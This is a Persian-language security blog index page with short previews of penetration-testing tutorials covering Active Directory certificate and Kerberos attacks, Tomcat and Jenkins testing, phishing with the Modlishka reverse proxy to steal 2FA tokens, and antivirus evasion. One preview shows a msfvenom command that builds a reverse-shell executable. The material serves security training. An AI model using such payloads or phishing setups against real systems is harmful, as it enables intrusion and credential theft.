آموزش‌های لیان

  • ADCS ESC5 : آسیب‌پذیری در کنترل دسترسی به اشیاء زیرساخت کلید عمومی

    ADCS ESC5 : آسیب‌پذیری در کنترل دسترسی به اشیاء زیرساخت کلید عمومی

    حمله ESC5 یکی از حملات با ریسک بالا علیه زیرساخت سرویس‌های گواهی‌نامه‌ی Active Directory Certificate Services (ADCS) محسوب می‌شود. این نوع حمله با سوء‌استفاده از دسترسی ناایمن به کلید خصوصی مرجع صدور گواهی‌نامه (Certificate Authority – CA) انجام می‌گیرد. در شرایطی که مهاجم بتواند به سطح دسترسی مدیر محلی (Local Administrator) در سرور CA دست یابد، قادر خواهد بود کلید…

    بیشتر بخوانید »
  • بررسی ماژول Autorize در نرم افزار Burp Suite

    بررسی ماژول Autorize در نرم افزار Burp Suite

    برای محافظت از دارایی‌های آنلاین، تست امنیتی برنامه‌های تحت وب یکی از ارکان اساسی در فرآیند ایمن‌سازی آن‌ها محسوب می‌شود. ابزار Burp Suite سال‌هاست که به‌عنوان یکی از پیشروترین پلتفرم‌ها در این حوزه شناخته می‌شود و همچنان توسط کارشناسان امنیت سایبری و هکرهای کلاه‌سفید (Ethical Hackers) به‌طور گسترده مورد استفاده قرار می‌گیرد. در میان افزونه‌های مختلفی که در جامعه‌ی تست…

    بیشتر بخوانید »
  • تست نفوذ Tomcat

    تست نفوذ Tomcat

    Tomcat Penetration Testing نقش حیاتی در شناسایی آسیب‌پذیری‌های موجود در Apache Tomcat ایفا می‌کند؛ سرویسی که به‌طور گسترده به‌عنوان یک web server و servlet container در توسعه‌ی برنامه‌های تحت وب مورد استفاده قرار می‌گیرد. در ابتدا، Apache Software Foundation این پروژه را با هدف ارائه‌ی یک پلتفرم نمایشی برای فناوری‌های Java Servlet و JavaServer Pages (JSP) راه‌اندازی کرد؛ فناوری‌هایی که…

    بیشتر بخوانید »
  • تست نفوذ Jenkins

    تست نفوذ Jenkins

    تست نفوذ Jenkins برای شناسایی آسیب‌پذیری‌های امنیتی در Jenkins ضروری است. Jenkins یک سرور اتوماسیون متن‌باز است که برای پیاده‌سازی پیوسته (Continuous Integration – CI) و تحویل پیوسته (Continuous Delivery – CD) استفاده می‌شود. این ابزار که بر پایه زبان برنامه‌نویسی جاوا ساخته شده است، از یک پلتفرم اسکریپت‌نویسی بهره می‌برد تا وظایفی مانند ساخت، تست و استقرار در چرخه…

    بیشتر بخوانید »
  • تحلیل فنی بهره‌برداری از آسیب‌پذیری Race Condition با استفاده از Turbo Intruder

    تحلیل فنی بهره‌برداری از آسیب‌پذیری Race Condition با استفاده از Turbo Intruder

    سوءاستفاده از Race Condition با استفاده از Turbo Intruder یکی از تکنیک‌های مهم در حوزه امنیت برنامه‌های وب است. Race Condition زمانی رخ می‌دهد که چندین Thread یا Process به‌صورت هم‌زمان به منابع مشترک دسترسی پیدا کنند و این هم‌زمانی می‌تواند منجر به رفتارهای غیرقابل پیش‌بینی در برنامه شود. در این مقاله، نحوه بهره‌برداری از این آسیب‌پذیری را با استفاده…

    بیشتر بخوانید »
  • افزایش سطح دسترسی از طریق Disk Group

    افزایش سطح دسترسی از طریق Disk Group

    افزایش سطح دسترسی از طریق Disk Group  یک روش حمله پیچیده به شمار می‌رود که آسیب‌پذیری‌ها یا تنظیمات نادرست موجود در سامانه مدیریت دیسک گروه‌ها در محیط‌های Linux را هدف قرار می‌دهد. در این نوع حمله، مهاجمان معمولاً تمرکز خود را بر روی دستگاه‌های دیسک نظیر /dev/sda قرار می‌دهند؛ مسیری که در سیستم‌عامل Linux نمایانگر دیسک سخت اصلی بوده و…

    بیشتر بخوانید »
  • حمله‌ی Sapphire Ticket بهره‌برداری مخرب از سازوکار اعتماد در پروتکل احراز هویت Kerberos

    حمله‌ی Sapphire Ticket بهره‌برداری مخرب از سازوکار اعتماد در پروتکل احراز هویت Kerberos

    حملات Sapphire Ticket شکلی پیشرفته از بهره‌برداری از پروتکل Kerberos در محیط‌های Active Directory به‌شمار می‌روند. با گسترش روزافزون استفاده از Active Directory، مهاجمان نیز به‌طور مداوم در حال تکامل روش‌های خود برای دور زدن سامانه‌های احراز هویت هستند. به‌عنوان نمونه، در تحولات اخیر این حوزه، حملات Diamond Ticket و Sapphire Ticket معرفی شده‌اند که هر یک امکان دسترسی غیرمجاز…

    بیشتر بخوانید »
  • اجرای حملات فیشینگ از طریق پروکسی معکوس HTTP با بهره‌گیری از ابزار Modlishka

    این آزمایشگاه نشان می‌دهد چگونه می‌توان یک پروکسی معکوس HTTP به‌نام Modlishka راه‌اندازی کرد که در کارزارهای فیشینگ برای سرقت گذرواژه‌ها و توکن‌های احراز هویت دومرحله‌ای (۲FA) کاربران مورد استفاده قرار می‌گیرد. ابزار Modlishka این امکان را فراهم می‌سازد، زیرا به‌عنوان یک عامل مرد میانی (MITM) میان کاربر قربانی و وب‌سایتی که مهاجم در حال جعل هویت آن است قرار…

    بیشتر بخوانید »
  • راه اندازی سرورهای واسط و انتقال‌دهنده ایمیل SMTP Forwarders / Relays

    راه اندازی سرورهای واسط و انتقال‌دهنده ایمیل SMTP Forwarders / Relays

    راه‌اندازی سرور Relay Mail Server قرار است یک سرور ایمیل راه‌اندازی کنیم که در ادامه، به‌عنوان یک سرور SMTP relay مورد استفاده قرار خواهد گرفت. در اولین گام، یک droplet  (سرور مجازی) جدید با سیستم‌عامل Ubuntu در پلتفرم DigitalOcean ایجاد شد. نصب Postfix به‌عنوان MTA روی droplet apt-get install postfix در طول نصب Postfix، دامنه‌ی nodspot.com را به‌عنوان نام ایمیل…

    بیشتر بخوانید »
  • روش‌های عبور از آنتی‌ویروس با بهره‌گیری از قالب‌های آماده Metasploit و ساخت فایل‌های اجرایی سفارشی

    روش‌های عبور از آنتی‌ویروس با بهره‌گیری از قالب‌های آماده Metasploit و ساخت فایل‌های اجرایی سفارشی

    در اینجا نگاهی سریع داریم به چند روش ساده برای عبور از شناسایی آنتی‌ویروس‌ها هنگام استفاده از شل‌کدها. ۴۸ مورد شناسایی از بین ۶۸ آنتی‌ویروس برای تست اولیه، یک پی‌لود Reverse Shell استاندارد با استفاده از Metasploit برای سیستم‌های ۳۲ بیتی ویندوز تولید می‌کنیم. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f exe > /root/tools/av.exe با بررسی این فایل در سرویس VirusTotal،…

    بیشتر بخوانید »
دکمه بازگشت به بالا